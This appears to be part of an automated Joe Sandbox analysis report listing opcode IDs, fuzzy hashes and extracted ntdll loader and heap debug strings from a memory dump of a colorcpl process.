• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
• API String ID: 0-2968386058
• Opcode ID: ad4f67227edbb25b3fc846996a0e4c34c0596aefdee2d4fb36756c94b8879969
• Instruction ID: a771706e15e456a53cbfe3131cf48fbcbf20175ae80d887228555bed37d2d6da
• Opcode Fuzzy Hash: ad4f67227edbb25b3fc846996a0e4c34c0596aefdee2d4fb36756c94b8879969
• Instruction Fuzzy Hash: B2417372E04309EBDB01CBD4C994FEFBBB9AB18B04F10416AEA05B7244D774AA44CB50

Strings
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
• API String ID: 0-1373925480
• Opcode ID: 09de07f9d8a34d00ee2d517e5634337df7d4f070342cbeda8678256acf672e40
• Instruction ID: 476384729d30eabc3f53bc3b5852da60ba0aa6f25ed1e88afbd516d732326be7
• Opcode Fuzzy Hash: 09de07f9d8a34d00ee2d517e5634337df7d4f070342cbeda8678256acf672e40
• Instruction Fuzzy Hash: 1341D332D097588BEB22CBA5C964BEEB7B9EFA5344F100569D900FF791DB348901CB51

Strings
• Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 227A4888
• minkernel\ntdll\ldrredirect.c, xrefs: 227A4899
• LdrpCheckRedirection, xrefs: 227A488F
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
• API String ID: 0-3154609507
• Opcode ID: 74002a63912003e166372ec4c101f4bf37c184662c4a218796b3854f3a8dab54
• Instruction ID: c4b7bc5366ceaa7ce68fe5313cec6f55f1c355853fa6e9e012cd351303e96775
• Opcode Fuzzy Hash: 74002a63912003e166372ec4c101f4bf37c184662c4a218796b3854f3a8dab54
• Instruction Fuzzy Hash: AA41C132A093919FCB12CF68DA71E167BE5AF49660F010779ED89A7255D732D800CB91

Strings
• RtlpResUltimateFallbackInfo Exit, xrefs: 2272A309
• RtlpResUltimateFallbackInfo Enter, xrefs: 2272A2FB
• PSo", xrefs: 2272A348
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: PSo"$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
• API String ID: 0-2379348149
• Opcode ID: f79e81a2672580efbbd2a5f070a2199d25e0b0da8e62f7ee78f625f44ef2c6c3
• Instruction ID: f720d4d9bd57de263081efc0c85d6dc6a6b188fed9bed019a7c848694be427cf
• Opcode Fuzzy Hash: f79e81a2672580efbbd2a5f070a2199d25e0b0da8e62f7ee78f625f44ef2c6c3
• Instruction Fuzzy Hash: 3141D031A09B89DBEB12CF69C640F597BB4FF94704F2042A9E900EB252E379CE00CB51
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                          • API String ID: 0-2558761708
                                                                                                                                          • Opcode ID: 0479fccabe3c3bf72883ca7d31819215eb06e1f97cec474852286c839db86db5
                                                                                                                                          • Instruction ID: ebcca9d5babc73caed61e8cf019624386df96fc13988514e6b041d839b957087
                                                                                                                                          • Opcode Fuzzy Hash: 0479fccabe3c3bf72883ca7d31819215eb06e1f97cec474852286c839db86db5
                                                                                                                                          • Instruction Fuzzy Hash: 6511263131D301DFD71ACB14C884F9AB3A6EF4071AF158269E40AEB296EB34DC41C752
                                                                                                                                          Strings
                                                                                                                                          • LdrpInitializationFailure, xrefs: 227A20FA
                                                                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 227A20F3
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 227A2104
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-2986994758
                                                                                                                                          • Opcode ID: 916dea2dd3de4a6e3eb5d325bfe476c7f5607e28e016046e3f55b318878fb4dc
                                                                                                                                          • Instruction ID: 6c8b62dc5ff81a68dcfe0610c5172a3161368474a81a074c9fac1af1bc25fc01
                                                                                                                                          • Opcode Fuzzy Hash: 916dea2dd3de4a6e3eb5d325bfe476c7f5607e28e016046e3f55b318878fb4dc
                                                                                                                                          • Instruction Fuzzy Hash: B0F04632644308BBEB10DB0CCD96FA937A8EB51B68F200429FB047B2C5D6F0EA04C680
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                          • String ID: #%u
                                                                                                                                          • API String ID: 48624451-232158463
                                                                                                                                          • Opcode ID: 35057b13c356529a4d692937adde65f9f9ee1275bf31cd51981a858eab2a9222
                                                                                                                                          • Instruction ID: f5c1ddb290b56f5cc31bae7c6c0052def046369e97fe91e66b9ec5b826bf0fee
                                                                                                                                          • Opcode Fuzzy Hash: 35057b13c356529a4d692937adde65f9f9ee1275bf31cd51981a858eab2a9222
                                                                                                                                          • Instruction Fuzzy Hash: DF715D71A043499FDB02CFA9C994FAEB7F8AF58704F144165E904EB251EA74EE01CBA1
                                                                                                                                          Strings
                                                                                                                                          • LdrResSearchResource Enter, xrefs: 2272AA13
                                                                                                                                          • LdrResSearchResource Exit, xrefs: 2272AA25
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                          • API String ID: 0-4066393604
                                                                                                                                          • Opcode ID: 638239a7c7f2bb3346ab40ec9ba727512848ea1fed7c6e95ef1778e66056b9a6
                                                                                                                                          • Instruction ID: 6daeb4e75b5554cb6b09627432b47052e74915acce8364d019c88962fd8b2ff6
                                                                                                                                          • Opcode Fuzzy Hash: 638239a7c7f2bb3346ab40ec9ba727512848ea1fed7c6e95ef1778e66056b9a6
                                                                                                                                          • Instruction Fuzzy Hash: 74E18171E08B59AFEB11CF99CA80B9EB7BAFF15354F100226E900EB251D778D940DB51
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: `$`
                                                                                                                                          • API String ID: 0-197956300
                                                                                                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                          • Instruction ID: ad65c3796c28e9955cecaca41d7d8b9b57d8ed5bb98579160bb9025d4c764e9a
                                                                                                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                          • Instruction Fuzzy Hash: 55C1E2712083429BDB15CF28C945B2BBBE5EFD4358F044A2CFA9ACB291D778D505CB61
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID: Legacy$UEFI
                                                                                                                                          • API String ID: 2994545307-634100481
                                                                                                                                          • Opcode ID: 9df8f64df6416e796aa87d5eeda82330f88a320213bf4545e6da317e7b4000ec
                                                                                                                                          • Instruction ID: 9dea25fdadc4cecb45678684b8ee62c91e397719afd7987fe87357b1a5103355
                                                                                                                                          • Opcode Fuzzy Hash: 9df8f64df6416e796aa87d5eeda82330f88a320213bf4545e6da317e7b4000ec
                                                                                                                                          • Instruction Fuzzy Hash: A2617971E087089FDB15CFA8DA81FAEBBB5FB48704F50412AE648EB251D731A940CB50
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$MUI
                                                                                                                                          • API String ID: 0-17815947
                                                                                                                                          • Opcode ID: d20e1393bd215a4e68358b99e4ae5640dae81390c1b05475ede3f7286c862fab
                                                                                                                                          • Instruction ID: e7ce706389b04eb5f4c85dab9516555c9c2d285acfbb00f633f123061f9c55b4
                                                                                                                                          • Opcode Fuzzy Hash: d20e1393bd215a4e68358b99e4ae5640dae81390c1b05475ede3f7286c862fab
                                                                                                                                          • Instruction Fuzzy Hash: 5C513971E0431DAEDB12CFA5CD94EEEBBB8EB54754F100529EA11B7290D7709E05CBA0
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                                                                          • API String ID: 2994545307-4008356553
                                                                                                                                          • Opcode ID: de773943236057cc038da91c99c03f4460f259c3dad8826a70b973a055f5c6f7
                                                                                                                                          • Instruction ID: a0a1e01da4a93eea930896cd71b72bc06685a45cb7deac8c9e4c22b1e77e0bc5
                                                                                                                                          • Opcode Fuzzy Hash: de773943236057cc038da91c99c03f4460f259c3dad8826a70b973a055f5c6f7
                                                                                                                                          • Instruction Fuzzy Hash: FB01F4B2648740AFE311CF24CD85F26B7E8EB54719F018939AA58C72D0E338D818CB46
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: MUI
                                                                                                                                          • API String ID: 0-1339004836
                                                                                                                                          • Opcode ID: 88bf4191e90b764201fecfbdb100e5dfd70b148473e33c64bd9851fbd5439287
                                                                                                                                          • Instruction ID: 98cdee63349fa9ccde80eb1bfffc4daea7ce462ba61a270a584ff80b4af2c5d8
                                                                                                                                          • Opcode Fuzzy Hash: 88bf4191e90b764201fecfbdb100e5dfd70b148473e33c64bd9851fbd5439287
                                                                                                                                          • Instruction Fuzzy Hash: 77826C75E08B188FDB24CFA9C980BEDB7B1FF58354F11826AE919AB351D7309981CB50
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                          • Opcode ID: 397744f19132db87aa0e5bac8f591060a06732db60c42d8a67f4ab3517ecd7ea
                                                                                                                                          • Instruction ID: ba7ea1e7e3b01d618b0b8fb634aaf4784525a0b36cb85cbe6156616e79ab7c34
                                                                                                                                          • Opcode Fuzzy Hash: 397744f19132db87aa0e5bac8f591060a06732db60c42d8a67f4ab3517ecd7ea
                                                                                                                                          • Instruction Fuzzy Hash: 74916171A45319AFEB22DF94CD95FAE7BB8EF18754F100165F700AB291DA74AD00CBA0
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                          • Opcode ID: 8bc7c5b2361ca9890d2eb5368de506aa797418bc23856f712f2007eb75026b03
                                                                                                                                          • Instruction ID: bc4ea83dca6241935b755a0712ec2b1daa0c02d28fbc69cb819c0e8eb3f1a6e1
                                                                                                                                          • Opcode Fuzzy Hash: 8bc7c5b2361ca9890d2eb5368de506aa797418bc23856f712f2007eb75026b03
                                                                                                                                          • Instruction Fuzzy Hash: 7291B132909748BBDB239FA4DD48FAFBBB9EF85744F100029F900A7251EB749941CB91
                                                                                                                                          Strings
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: GlobalTags
• API String ID: 0-1106856819
• Opcode ID: f9613c5aa73c3194eb18bfa3182443baa1bc92239c074878a7942b0f6141c64d
• Instruction ID: d6dbdc9903c1a20a596a38eb07af2477de10b75775ddbe8e16e9c7d22f2a253f
• Opcode Fuzzy Hash: f9613c5aa73c3194eb18bfa3182443baa1bc92239c074878a7942b0f6141c64d
• Instruction Fuzzy Hash: 30718C75E0834ADFDB18CFA8E691A9DBBB1BF58704F10822AE905A7341EB359901CF50

Strings
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: .mui
• API String ID: 0-1199573805
• Opcode ID: 7dff067ba323be67d993440a019c69f72da52ba882ffc66814cc4805ea8b350d
• Instruction ID: 641ccaa0b952da225c2b40dcae6fee9bb712c85ccb331c3f41b943e67871476e
• Opcode Fuzzy Hash: 7dff067ba323be67d993440a019c69f72da52ba882ffc66814cc4805ea8b350d
• Instruction Fuzzy Hash: CA519F72D09729DFCF11CFA8C954AAEBBB4AF08B04F05417AEA11BB250D7348D01DBA4

Strings
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: EXT-
• API String ID: 0-1948896318
• Opcode ID: 362eff65e96bc21a4911cfe62017aa90b8da5feeeca2314436235f08f2fe8c57
• Instruction ID: bffb8400f80cae1156a9137463cbd755f33fdb5a4427b272841eb08ce327b3d4
• Opcode Fuzzy Hash: 362eff65e96bc21a4911cfe62017aa90b8da5feeeca2314436235f08f2fe8c57
• Instruction Fuzzy Hash: E441BF7250D3169BD712CB70C984F6BB7E8AF88718F400A2DFA84E7182EA34C904C793

Strings
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: BinaryHash
• API String ID: 0-2202222882
• Opcode ID: a5c586668345145726b5d1b717139a9bd424c1c6ca50d752829876764a14f23d
• Instruction ID: 6e1c3bf6fc7cb7a8bd0a867d68dc8d34f3d4cb568874e4a5d08a2bcd755b1bea
• Opcode Fuzzy Hash: a5c586668345145726b5d1b717139a9bd424c1c6ca50d752829876764a14f23d
• Instruction Fuzzy Hash: 9C4141B1D0532DEADF21CB60DC85FEE777CAB55714F0045E9AA08AB140DB709E888BA5

Strings
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: #
• API String ID: 0-1885708031
• Opcode ID: 58765d9909157f73cc7fceab11f03ffbaef81449c84313cb58489ae1a6dbcb2f
• Instruction ID: dfc29e989227a548709e7f35657896e6abc6a064d3ad052914763925afd02ad3
• Opcode Fuzzy Hash: 58765d9909157f73cc7fceab11f03ffbaef81449c84313cb58489ae1a6dbcb2f
• Instruction Fuzzy Hash: 4A313531A097589BDB22CF68C854BEE77F8DF05709F504068EA40AB282CB79ED05CB90

Strings
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: BinaryName
• API String ID: 0-215506332
• Opcode ID: 4be9502124086cdf1268934ec6fa848022e4a4a450aa3a4849fc6f0643a60113
• Instruction ID: e15fbe1b1e47c406850a245a7a9bd0467c5418f04bf1fce221384e32f9c17db3
• Opcode Fuzzy Hash: 4be9502124086cdf1268934ec6fa848022e4a4a450aa3a4849fc6f0643a60113
• Instruction Fuzzy Hash: CE310336A09755EFEF16CB58D945E6FBB74EB88760F01416DA914AB290D7309E00CBE0

Strings
• AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 227A895E
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
• API String ID: 0-702105204
• Opcode ID: 55f2712b692c1020e8cffff42fe9a0e0e8ac7864dd6721d5a0b0d2e52cb68f13
• Instruction ID: 9f53c3bb0dfb99824e5b8bcff11ed0a9e8cf6287a3557c6cb0587366691464ad
• Opcode Fuzzy Hash: 55f2712b692c1020e8cffff42fe9a0e0e8ac7864dd6721d5a0b0d2e52cb68f13
• Instruction Fuzzy Hash: C001F736208300DBE7255A55C9ECE56BFA5FF85374B800728E68517595CB28A881C6D2

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 23ac363601a0ecd45d2ad147894b96dbad209fbfc425d1b1a3decea250f5109a
• Instruction ID: 84506936f366cce2be9c81bc2fb87c5c40634c4a9bf52e13bcf8c2b4c6f1cbea
• Opcode Fuzzy Hash: 23ac363601a0ecd45d2ad147894b96dbad209fbfc425d1b1a3decea250f5109a
• Instruction Fuzzy Hash: 4B42EC3260C3419BD716CF78C990B6BB7E5AFA8B04F44093DFA8297261DBB0D945CB52

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e47bd59fad67634989e7b5304406045e038e302e84fbcba5a2f2195a5b503f6a
• Instruction ID: 5d127e0a7ab3cd77a0b3c48b7fcc8dc1a9d6743165bb0e7f52fa1ea51cb009c8
• Opcode Fuzzy Hash: e47bd59fad67634989e7b5304406045e038e302e84fbcba5a2f2195a5b503f6a
• Instruction Fuzzy Hash: 2B426A75E143198FDB25CF69C881BAEB7F5BF88304F548199E948EB242DB349981CF60

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 28078f7ff156b59779c4ee9092a8b017514c46f6dee1c6505e81903cd2d3f7e2
• Instruction ID: c6793d2f71383df19bfe1bf69d5d82a802c1b42b7b965e98a4acf18479daa59a
• Opcode Fuzzy Hash: 28078f7ff156b59779c4ee9092a8b017514c46f6dee1c6505e81903cd2d3f7e2
• Instruction Fuzzy Hash: 1D325470A08755EFDB15CF65C944BAEBBF2BF84304F20421DD58AAB285DB34A902DF52

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0b9e505ecc4570401c109c3c81e879ac616957d47b3705fe064a0da6ad7a2dbf
• Instruction ID: 287aff7f53c9db508e8abe39f4d6a30dec56f1bdfa094a6cbde936bd8c954040
• Opcode Fuzzy Hash: 0b9e505ecc4570401c109c3c81e879ac616957d47b3705fe064a0da6ad7a2dbf
• Instruction Fuzzy Hash: 5222FF706087618BDB14CF39C190B72B7F1BF4434AF54859AEA869F286E33DE552CB60

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 440953c27a4273bcb2b272bd01f9008318a79a5840880cdf33dad81ca0bc4cbd
• Instruction ID: ce50ec485486b68d0519a0f4da7c3ccc91bc89ac47a82eefb7859db143cb78ca
• Opcode Fuzzy Hash: 440953c27a4273bcb2b272bd01f9008318a79a5840880cdf33dad81ca0bc4cbd
• Instruction Fuzzy Hash: BB327671A09704CFCB15CF69C580B9AB7F1FF48304F20866AE959AB6A2D734ED41CB91

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
• Instruction ID: 676534e73a8a6db78efb6f635fc4e034d98920e3735c6abb42b6ae0c1937e3eb
• Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
• Instruction Fuzzy Hash: 7CF17E70E093199BDB15CFA5C5A0BAEBBF5BF48714F048129EA04EB341EB34D941EB61

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fef2e3851ccaf1db7e3cfb451a3f25b842f6562525eba4dc5ac5006626a12dcc
• Instruction ID: e465a602e3795e9a08949a2ee12023c801770e43a087a03c911bcc176411c46d
• Opcode Fuzzy Hash: fef2e3851ccaf1db7e3cfb451a3f25b842f6562525eba4dc5ac5006626a12dcc
• Instruction Fuzzy Hash: 57D1E371E097098BDB05CF69C841BEFB7F1AF88304F98826AD955E7241D739EA05CB60

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 83810d49d509d4fbbfafa9699562174fb43507633bbc45b601e1522663c9fb13
• Instruction ID: 7228c9aa269d9b2f202b3a41df74b65277250e09607fee6d611160fb0b8fc9b3
• Opcode Fuzzy Hash: 83810d49d509d4fbbfafa9699562174fb43507633bbc45b601e1522663c9fb13
• Instruction Fuzzy Hash: 5DE16A7160D742CFC305CF28C590A5ABBE0BF89318F458A6EE99997351DB31EE05CB92

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 27a14c84c91e8ccaae367e95da6f93a1d9660debdc165a5a9acf053ef11459d2
                                                                                                                                          • Instruction ID: eda5fbec12a4a8237e896632c32e68e78c476f19c4cdd755a4a96a4d5813040b
                                                                                                                                          • Opcode Fuzzy Hash: 27a14c84c91e8ccaae367e95da6f93a1d9660debdc165a5a9acf053ef11459d2
                                                                                                                                          • Instruction Fuzzy Hash: 6ED1E171A08716DBEB05CF64C981FAA77F5FF54318F844629EA25EB281EB34DA40CB50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                          • Instruction ID: 6ef6d9f01b924198ad31e86a8c06312cb492d17608c79a2a60de8fdce80cb512
                                                                                                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                          • Instruction Fuzzy Hash: 38B1B275A047049FDB15DF95CA64FABBBB9FF84324F90462DAA01A7290DB30ED05CB50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                          • Instruction ID: 20562b5f9094b61a15661a61f9c77a9862a954826e14e19202ac0fac947e7b8c
                                                                                                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                          • Instruction Fuzzy Hash: B8B11732A087559FDB12CB64C950FAEBBF6AF84304F1402A9E651EB382DB70D941DB91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
